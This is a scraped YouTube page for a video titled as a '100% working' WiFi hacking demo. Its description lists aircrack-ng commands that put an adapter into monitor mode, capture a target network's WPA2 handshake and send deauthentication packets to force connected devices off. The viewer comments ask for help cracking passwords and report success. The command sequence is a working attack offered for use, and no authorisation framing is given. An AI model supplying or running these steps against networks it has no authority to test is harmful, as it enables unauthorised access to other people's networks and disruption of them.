Hack WIFI using Kali Linux 100% working | Practical Demo | #makeeasy

preview_player
Показать описание
#NetworkHacking #wifihacking
This video shows how to hack wifi (wpa2) and try bruteforce attack and even secure wifi.

Commands:
sudo su
cd /home/kali/Desktop/
iwconfig
airmon-ng check kill
airmon-ng start wlan0
iwconfig
airodump-ng wlan0
airodump-ng --bssid "mac of wifi" --channel 9 --write hack wlan0

Open New Terminal:
aireplay-ng --deauth 25 -a "mac of wifi" -e "mac of connected device" wlan0
cd /home/kali/Desktop/

WiFi hacking,
Network security,
Wireless penetration testing,
Cracking WiFi password,
WiFi security vulnerabilities,
Ethical hacking,
Man-in-the-middle attack,
WiFi sniffing,
Wireless network auditing,
Password cracking,
WiFi encryption protocols,
Brute-force attack,
Packet sniffing,
WPA/WPA2 security,
WiFi cracking tools,
WiFi hotspot security,
Wireless network reconnaissance,
Rogue access points,
Wireless network intrusion detection,
WiFi cracking tutorials,

► Disclaimer:- [Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use]
Channel Description :
Make Easy
This channel is created to make any concept easier.

#koolsantosh #makeeasy

IF This video is helpful then

..................................................................
Like Subscribe Comment & Share
..................................................................
Рекомендации по теме
Комментарии
Автор

it's old way.... depende if you have exact password in the file of passwords, if password is not there, then go to neighbours and ask for password and write it on the file, like that the cracking will be successful

rdl
Автор

00:01 Hack Wi-Fi using Kali Linux with ease
01:05 Setting up USB Wi-Fi adapter in Kali Linux
02:14 Using Kali Linux to hack WIFI
03:29 Capturing handshake file and conducting attack to find the password.
04:37 Using Kali Linux to crack WiFi passwords and disconnect devices
05:50 Capturing WPA handshake for network security.
07:08 Using Brute Force attack to decrypt hack01.cap file.
08:33 Brute Force attack can quickly reveal WiFi passwords.

debashismandi
Автор

Thank you so much for the excellent class. I haven't seen your previous tutorial, but I'll look it up now. I'm from Brazil. Thank you very much.

cleberiack
Автор

If it was so easy that all people hacking wirelessly, you put your password in the password list, four to one, you wouldn't do it. If you were, you would hack with a script.

Sasan.Mobarez
Автор

Thanks bro its perfectly working for me❤

Kezo-cvuu
Автор

my ssid are not showing, it worked at the first time but when i tried again thoae are not showing again

shahnawazali
Автор

Bro can you tell me how to extract file which you are telling at 8:31
Please bro help me

fact
Автор

Sir, i try this but showing on me interface wlan0 down and read failed : network is down.

shivam_editz_
Автор

It is much easier to just use fern which kali already comes with, does the exact same thing as this except everything is automated.

chaostheory
Автор

1:58 which key is used in back typing mode?

NizamulMulk-BD
Автор

Do I need to connect to the Wi-Fi network to find out its password, or can you guarantee me that by using the exact method you provided and getting everything right, I can retrieve the password?

vishal_dhanwaria
Автор

this method is already obsolete with WPA3. Or with long passwords (not in a list) you can forget that method..

HubertHafenbrugger
Автор

Can you dencrypt password in handshake file by any other method rather than brute force ? Because by using this method its shows keys not found.

RohitMourya-nuuh
Автор

What is the USB device, which showing in the 1:13 ? 🤔

dream.Creator.bit
Автор

No one: ...
An Indian youtuber: Saved my life :))

miniMinn-music
Автор

i have a alfa awus036acs wifi adapter and i cannot get it to work in Kali linux. I have watch several videos and nothing helps
can you assist

DavidBanner-gpwp
Автор

when put the bsssd and channel then enter the result as airodump --ng for help for help what can i do?🙏

azagnto
Автор

What if the password is some indian name or something which is personal to the owner? Will it still be able to crack it?

Duel
Автор

Can u help me I can not find any WIFI networks, I have TPlink USB WIFI adapter and it is in Mode:Monitor Frequency, what should be the reason?

MgebrishviliIrakli
Автор

7:37 bro after this u said to use unzip command and what is the unzip commad pls say its not working for me

indharaniv